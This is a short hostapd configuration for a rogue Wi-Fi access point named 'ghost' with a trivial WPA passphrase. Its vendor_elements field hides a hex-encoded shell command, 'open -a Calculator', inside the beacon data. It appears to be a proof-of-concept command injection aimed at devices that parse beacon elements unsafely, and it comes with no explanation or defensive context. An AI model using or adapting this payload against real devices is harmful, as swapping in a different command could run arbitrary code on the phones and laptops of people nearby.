interface=wlan0

driver=nl80211

ssid=ghost

hw_mode=g

channel=6

auth_algs=3

wmm_enabled=1

#beacon_int=50

vendor_elements=dd16006363636f70656e202d612043616c63756c61746f72

wpa=1

wpa_passphrase=12345678

wpa_key_mgmt=WPA-PSK

wpa_pairwise=CCMP

